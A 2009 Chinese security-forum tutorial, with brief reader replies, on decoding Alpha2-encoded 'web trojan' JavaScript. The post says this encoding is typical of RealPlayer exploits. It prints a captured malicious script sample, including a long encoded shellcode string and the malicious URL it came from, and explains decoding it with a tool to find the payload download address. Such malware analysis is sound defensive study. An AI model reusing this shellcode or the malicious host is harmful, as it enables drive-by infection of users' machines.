roxiel 发表于 2009-8-20 11:10

网马解密大讲堂——网马解密中级篇004(Alpha2篇)

本帖最后由 roxiel 于 2009-8-20 11:12 编辑

by kongzi

Alpha2是Realplay漏洞多采用此加密方式,该加密方式特征:

代码开头:TYIIIIIIIIIIIIIIII;

一般情况下在网马解密过程中,在获取的恶意网址源代码中,代码开头有上述类似代码,使用得加密方式即为alpha2。


下面我们将结合实例讲解alpha2解密方法,我们先来看一个典型的alpha2加密的网马代码:
var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
ShellCode="";
ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";
ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";
ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";
ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";
ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";
ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";
ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";
ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";
ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";
ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";
ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";
ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";
ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";
ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";
ShellCode=ShellCode+"qvRHptd4RPFZVOdoSXQqrORXQy0a6QP86NPcbOpmTo1hsYu14oPfFUTnU3PspsOpgp";

我们将上述代码,复制粘贴至freshow的上操作区域,相见下列截图:

http://www.baidu163sinasohu.cn/sina/real.js这个恶意网址源代码内容为上述代码,
由于恶意网址的时效性,这个恶意网址已经失效,我将此js脚本源代码已保存,直接使用源代码来讲解,并不影响我们的讲解。

接下来我们要将此代码处理一下,去掉没有用的部分。相见下列截图:

大的红色框里内容为处理后源代码,实际就是将shellcode部分保留,删除其余无效代码内容。

接下来我们选择解密选项为alpha2,点击decode进行一次解密,解密后内容会显示在下操作区域,
点击up按钮将下操作区域代码上翻至上操作区域,进行二次解密,解密选项选择esc,点击decode进行二次解密,获得网马下载地址,请见下列截图:


frozenrain 发表于 2009-9-3 11:30

:lol跟着美女学习网页挂马

lidayue 发表于 2010-5-11 14:34

感谢教授教程..谢谢分享

royzua 发表于 2010-10-27 00:56

感谢网友们的无私奉献....相信论坛明天会更好。。学习ing

farmem 发表于 2011-1-11 22:15

支持感谢

孽小帅才 发表于 2011-10-26 18:39

支持。。学习。谢谢分享!!!
页: [1]
查看完整版本: 网马解密大讲堂——网马解密中级篇004(Alpha2篇)


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn